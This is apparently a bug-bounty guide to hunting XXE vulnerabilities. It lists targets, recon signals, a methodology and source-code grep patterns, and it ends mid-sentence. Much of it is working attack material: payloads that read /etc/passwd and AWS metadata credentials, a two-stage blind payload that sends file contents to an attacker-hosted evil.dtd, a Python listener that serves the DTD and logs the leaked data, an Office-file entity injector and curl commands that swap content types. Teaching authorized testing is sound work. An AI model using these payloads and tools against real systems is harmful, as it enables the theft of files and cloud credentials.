Crown Jewel Targets
XXE is a critical-severity vulnerability that consistently pays at the top of bug bounty scales ($5,000–$30,000+) due to its direct path to sensitive data exfiltration and SSRF. Highest-value targets:
- Large enterprise platforms with XML-heavy backend integrations (finance, logistics, ride-sharing APIs)
- Domains with file-read capability: /etc/passwd, /etc/shadow, internal config files, AWS metadata endpoints
- Subdomains sharing backend infrastructure: one XXE endpoint can pivot to internal services across dozens of domains (as demonstrated by 26+ Uber domains via a single entry point)
- API gateways accepting XML content types, especially REST APIs that silently accept Content-Type: application/xml
- File upload features: SVG, DOCX, XLSX, PDF, PPTX parsers on the server side
- SAML/SSO endpoints — SAML assertions are XML-based and frequently vulnerable
- Office/document processing services — any feature that converts or processes user-supplied documents
Attack Surface Signals
URL Patterns
/api/v*/xml
/upload
/import
/parse
/convert
/saml/acs
/sso/saml
/feed
/rss
/sitemap
/webdav
/soap/*
/wsdl
/service.asmx
/xmlrpc
/graphql (multipart with XML)
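The path list above can serve as a quick triage filter over a crawl or proxy export. The following is a minimal sketch, assuming the URLs are already collected as strings; the function name looks_xml_related and the exact regex are illustrative and not taken from any tool.

```python
import re
from urllib.parse import urlsplit

# Path fragments taken from the URL pattern list; extend per target.
XML_PATH_HINTS = re.compile(
    r"/(?:api/v\d+/xml|upload|import|parse|convert|saml/acs|sso/saml|feed|rss|"
    r"sitemap|webdav|soap|wsdl|service\.asmx|xmlrpc|graphql)(?![a-z])",
    re.IGNORECASE,
)


def looks_xml_related(url: str) -> bool:
    """Return True when the path (or a bare ?wsdl query) matches a known hint."""
    parts = urlsplit(url)
    if parts.query.lower() == "wsdl":  # e.g. /Service.svc?wsdl
        return True
    return XML_PATH_HINTS.search(parts.path) is not None
```

A match only raises the priority of an endpoint for manual testing; it says nothing about whether the parser behind it resolves entities.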
Request/Response Headers
Content-Type: application/xml
Content-Type: text/xml
Content-Type: application/soap+xml
Content-Type: multipart/form-data ← check file upload fields
Accept: application/xml
X-Content-Type-Options: (absent; a weak hint at best, since this header controls browser MIME sniffing rather than server-side parsing)
JavaScript Patterns (source recon)
// Look for in JS bundles
XMLSerializer
DOMParser
parseFromString
new ActiveXObject("Microsoft.XMLDOM")
$.parseXML(
xml2js
libxmljs
lxml // Python library: look for it in server-side code or error traces, not in JS bundles
Tech Stack Signals
- Java stacks: Spring, Struts, JAX-WS — default XML parsers (SAX, DOM) are XXE-vulnerable without explicit hardening
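- PHP: simplexml_load_string() and DOMDocument::loadXML() resolve external entities by default on builds linked against libxml2 older than 2.9.0 (typical of older pre-PHP 8 deployments); on newer builds they are exposed only when flags such as LIBXML_NOENT or LIBXML_DTDLOAD are passed
- Python: lxml (resolves entities by default; recent releases restrict this to internal entities), xml.etree (safe by default), xml.sax (resolved external entities by default before Python 3.7.1)
- Ruby: older Nokogiri versions, REXML
- Node.js: xml2js, libxmljs, fast-xml-parser (older versions)
- WSDL/SOAP services: always test, since legacy XML parsing is virtually guaranteed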
- File parsers: Apache POI (Java), python-docx, LibreOffice integrations
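Parser defaults like those listed above are easy to verify locally before relying on them. The sketch below uses only Python's standard library: it feeds xml.etree.ElementTree a file-read probe aimed at a throwaway temp file and reports whether the content came back. The function name and the canary string are illustrative.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path


def etree_resolves_external_entity() -> bool:
    """Probe ElementTree with an external entity that points at a temp file."""
    marker = "xxe-canary-12345"
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(marker)
        path = fh.name
    try:
        probe = (
            '<?xml version="1.0"?>'
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{Path(path).as_uri()}">]>'
            "<root>&xxe;</root>"
        )
        try:
            root = ET.fromstring(probe)
        except ET.ParseError:
            return False  # the parser refused the entity reference
        return marker in (root.text or "")
    finally:
        os.unlink(path)
```

The same probe-and-canary pattern can be pointed at any other parser in a lab copy of the target stack to confirm whether it is worth testing remotely.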
Step-by-Step Hunting Methodology
- Map every XML entry point: Use the Burp Suite passive scanner to flag all requests and responses with XML content types. Also intercept JSON endpoints and manually swap the Content-Type to application/xml with an equivalent XML body.
- Identify file upload features: Upload SVG, DOCX, and XLSX files and observe whether the server processes or renders the content. These formats are XML under the hood.
- Attempt inline XXE (classic file read): Replace the XML body with a basic entity test payload targeting /etc/passwd or C:\Windows\win.ini. Observe whether the file content is reflected in the response.
- If no reflection, pivot to blind OOB: Set up an OOB listener (Burp Collaborator, interactsh, or a self-hosted netcat listener, which catches HTTP only). Inject an external entity pointing to your callback URL. A DNS or HTTP hit confirms that the parser makes outbound connections.
- Escalate blind OOB to file exfiltration: Use a two-stage payload in which one parameter entity loads the local file and an externally hosted DTD wraps its content into a second entity that sends it out via an HTTP parameter or DNS lookup.
- Test SSRF pivot: Point the external entity at internal network addresses (http://169.254.169.254/latest/meta-data/, http://10.0.0.1/, http://localhost:8080/admin). Look for differences in response timing or error messages. The AWS metadata address answers a plain GET only where IMDSv1 is still enabled.
- Test all subdomains sharing the same backend: If one subdomain is vulnerable, enumerate and test all others systematically. Shared backend infrastructure means shared vulnerability.
- Test parameter-level injection: Some endpoints parse only specific XML nodes. Reference the entity in the text content of every element. The XML specification forbids external entity references inside attribute values, and entity references cannot appear in element names, so for those positions rely on parameter entities declared in the DOCTYPE.
- Test for error-based exfiltration: If OOB is blocked, trigger XML parsing errors that include file content in the error message returned to the client.
- Document the full impact chain: Demonstrate file read → SSRF → internal service access, and note which internal domains/IPs are reachable.
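The reflection check in the inline XXE step can be automated when many endpoints are in scope. The following is a minimal sketch, assuming the response body is already decoded to text; the signatures for /etc/passwd and win.ini are heuristics chosen for illustration and will miss unusual files.

```python
import re

# Heuristic fingerprints of the two probe files named in the methodology.
PASSWD_ROOT = re.compile(r"root:[^:\n]*:0:0:")
WIN_INI = re.compile(r"\[(?:fonts|extensions)\]|for 16-bit app support", re.IGNORECASE)


def classify_reflection(body: str) -> str:
    """Return 'passwd', 'win.ini', or 'none' for a response body."""
    if PASSWD_ROOT.search(body):
        return "passwd"
    if WIN_INI.search(body):
        return "win.ini"
    return "none"
```

A result of "none" does not rule out XXE; it only means the blind OOB steps are the next thing to try.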
Payload & Detection Patterns
Classic In-Band File Read
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>
Windows Equivalent
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root><data>&xxe;</data></root>
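The two payloads above differ only in the file URI, so a small builder keeps them consistent when probing several paths. This is a sketch under the assumption that the target accepts the same root/data layout as the examples; the function names are illustrative.

```python
from urllib.parse import quote

TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    "<!DOCTYPE foo [\n"
    '<!ENTITY xxe SYSTEM "{uri}">\n'
    "]>\n"
    "<root><data>&xxe;</data></root>"
)


def file_uri(path: str) -> str:
    """Turn a Unix or drive-letter Windows path into a file:// URI."""
    if len(path) > 1 and path[1] == ":":  # e.g. C:\Windows\win.ini
        return "file:///" + quote(path.replace("\\", "/"), safe="/:")
    return "file://" + quote(path, safe="/")


def build_file_read_payload(path: str) -> str:
    """Fill the classic in-band template with the URI for `path`."""
    return TEMPLATE.format(uri=file_uri(path))
```

For example, build_file_read_payload("/etc/hostname") yields the Linux payload with file:///etc/hostname as the entity target.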
Blind OOB — DNS/HTTP Callback
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://YOUR.BURPCOLLABORATOR.net/xxe-test">
]>
<root><data>&xxe;</data></root>
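When many endpoints are tested at once, a unique callback hostname per request makes it possible to tell which one triggered a hit. The sketch below assumes a callback domain with wildcard DNS (the domain in the usage line is hypothetical); the function name and label scheme are illustrative.

```python
import re
import secrets


def tagged_callback_payload(collab_domain: str, endpoint_label: str) -> tuple[str, str]:
    """Return (callback_host, payload) using a per-endpoint, per-run subdomain."""
    # Reduce the label to DNS-safe characters and keep it well under 63 bytes.
    slug = re.sub(r"[^a-z0-9]+", "-", endpoint_label.lower())[:40].strip("-") or "xxe"
    host = f"{slug}-{secrets.token_hex(4)}.{collab_domain}"
    payload = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY xxe SYSTEM "http://{host}/xxe-test">\n'
        "]>\n"
        "<root><data>&xxe;</data></root>"
    )
    return host, payload
```

Calling tagged_callback_payload("oob.example", "POST /api/v1/import") returns a host beginning with post-api-v1-import- followed by a random suffix, which can then be matched against the listener log.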
Blind OOB — File Exfiltration via Parameter Entity (two-stage)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://YOUR-SERVER/evil.dtd">
%dtd;
]>
<root><data>&send;</data></root>
evil.dtd (hosted on attacker server):
<!ENTITY % all "<!ENTITY send SYSTEM 'http://YOUR-SERVER/?data=%file;'>">
%all;
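The attacker-side half of the two-stage payload needs a server that hands out evil.dtd and records whatever arrives in the data parameter. The following is a minimal sketch using Python's standard http.server; the port, the handler name, and the YOUR-SERVER placeholder are assumptions, and nothing here handles TLS or concurrent load.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit


def build_evil_dtd(callback_base: str) -> str:
    """DTD that wraps %file; into a general entity fetching callback_base."""
    return (
        f"<!ENTITY % all \"<!ENTITY send SYSTEM '{callback_base}/?data=%file;'>\">\n"
        "%all;\n"
    )


def extract_leak(request_path: str):
    """Return the value of the data parameter, or None when it is absent."""
    values = parse_qs(urlsplit(request_path).query, keep_blank_values=True).get("data")
    return values[0] if values else None


class ExfilHandler(BaseHTTPRequestHandler):
    callback_base = "http://YOUR-SERVER"  # placeholder: public URL of this listener

    def do_GET(self):
        if urlsplit(self.path).path == "/evil.dtd":
            body = build_evil_dtd(self.callback_base).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        leak = extract_leak(self.path)
        if leak is not None:
            print(f"[leak from {self.client_address[0]}]\n{leak}")
        self.send_response(204)
        self.end_headers()


def serve(port: int = 8000) -> None:
    """Block and serve until interrupted."""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Run serve() on the callback host. Multi-line files may break the outgoing URL in some parsers, so a single-line file such as /etc/hostname is a friendlier first target than /etc/passwd.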
SSRF via XXE (AWS Metadata)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&ssrf;</data></root>
SVG XXE (for file upload endpoints)
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<svg width="512px" height="512px" xmlns="http://www.w3.org/2000/svg">
<text font-size="14" x="0" y="16">&xxe;</text>
</svg>
DOCX/XLSX XXE — Inject into [Content_Types].xml or word/document.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR-SERVER/xxe-test"> %xxe;]>
<Types xmlns="..."><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/></Types>
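Injecting into an Office document means unzipping it, editing one XML part, and zipping it back up. The sketch below does this in memory with Python's zipfile module; the function name is illustrative, and it assumes the chosen part starts with an XML declaration, after which the DOCTYPE is placed.

```python
import io
import re
import zipfile

XML_DECL = re.compile(rb"<\?xml[^>]*\?>")


def inject_doctype(ooxml: bytes, part: str, doctype: bytes) -> bytes:
    """Return a copy of the archive with `doctype` inserted into one XML part."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(ooxml)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == part:
                match = XML_DECL.search(data)
                cut = match.end() if match else 0  # DOCTYPE must follow the declaration
                data = data[:cut] + doctype + data[cut:]
            dst.writestr(info.filename, data)
    return out.getvalue()
```

Typical values for part are "[Content_Types].xml" or "word/document.xml"; the result can be written to a .docx file and uploaded as usual.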
Content-Type Swap (JSON to XML)
# Original JSON request
curl -X POST https://target.com/api/endpoint \
-H "Content-Type: application/json" \
-d '{"user":"test"}'
# Converted to XML for XXE testing
curl -X POST https://target.com/api/endpoint \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://COLLABORATOR.net">]><user>&xxe;</user>'
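For larger JSON bodies the conversion is tedious by hand. The following is a minimal sketch that turns a flat JSON object into an XML body carrying the callback entity in its first field. The wrapper element name root and the one-element-per-key mapping are assumptions; the layout a given backend expects has to be found by experiment.

```python
import json
from xml.sax.saxutils import escape


def json_to_xxe_xml(json_body: str, callback_url: str, root: str = "root") -> str:
    """Map a flat JSON object to XML; the first field holds the &xxe; reference."""
    fields = json.loads(json_body)
    if not isinstance(fields, dict):
        raise ValueError("expected a JSON object at the top level")
    parts = []
    for index, (key, value) in enumerate(fields.items()):
        # Keys are assumed to be valid XML element names.
        text = "&xxe;" if index == 0 else escape(str(value))
        parts.append(f"<{key}>{text}</{key}>")
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{callback_url}">]>'
        f"<{root}>{''.join(parts)}</{root}>"
    )
```

The output is sent with Content-Type: application/xml in place of the original JSON body, exactly as in the second curl command.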
Grep Patterns for Source Code Review
# PHP
grep -rn "simplexml_load_string\|DOMDocument\|xml_parse\|loadXML\|SimpleXMLElement" .
# Java
grep -rn "DocumentBuilder\|SAXParser\|XMLReader\|XMLInputFactory\|TransformerFactory" .
# Python
grep -rn "lxml\|xml.sax\|parseString\|fromstring\|etree.parse" .
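# Look for hardening; parser call sites in files with no hits deserve a closer look
grep -rni "disallow-doctype-decl\|external.general.entities\|FEATURE_SECURE_PROCESSING\|ACCESS_EXTERNAL_DTD\|setExpandEntityReferences\|setFeature.*false" .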
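The grep commands list parser usage and hardening separately; combining the two per file narrows the review to parsers that show no hardening at all. This is a rough sketch for Java sources only. The two regexes are heuristics chosen for illustration, and a file that passes may still be misconfigured.

```python
import re
from pathlib import Path

PARSER_USE = re.compile(
    r"DocumentBuilderFactory|SAXParserFactory|XMLInputFactory|TransformerFactory|XMLReader"
)
HARDENING = re.compile(
    r"disallow-doctype-decl|external-general-entities|FEATURE_SECURE_PROCESSING|"
    r"ACCESS_EXTERNAL_DTD|SUPPORT_DTD|IS_SUPPORTING_EXTERNAL_ENTITIES"
)


def is_unhardened(source: str) -> bool:
    """True when a source file uses an XML parser and shows no hardening marker."""
    return bool(PARSER_USE.search(source)) and not HARDENING.search(source)


def unhardened_java_files(root: str) -> list[str]:
    """Walk `root` and list .java files flagged by is_unhardened."""
    hits = []
    for path in sorted(Path(root).rglob("*.java")):
        if is_unhardened(path.read_text(encoding="utf-8", errors="replace")):
            hits.append(path.relative_to(root).as_posix())
    return hits
```

Hardening applied in a shared factory class will not show up in the files that call it, so flagged files are candidates for review rather than confirmed findings.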
Common Root Causes
- Default parser configurations: Java's DocumentBuilderFactory resolves external entities by default, and PHP's DOMDocument and Python's lxml have done so in older versions or when entity substitution is switched on. Developers use them without reading the security docs.
- Framework upgrades without security re-review: Older versions of Spring, Struts, and similar frameworks enabled XXE by default; developers didn't re-audit XML handling when libraries changed.
- Hidden XML consumption: Developers accept JSON at the API layer but convert to XML internally, or use libraries (Apache POI, python-docx) to process uploads without realizing those formats are XML containers.
- Copy-paste code from StackOverflow: XML parsing examples online rarely include entity disabling. Developers copy minimal working examples straight into production.
- SAML/SSO library misconfigurations: SSO integrations often delegate XML parsing to third-party libraries with XXE enabled; developers assume "library handles security."
-
Testing gaps on non-primary content types — QA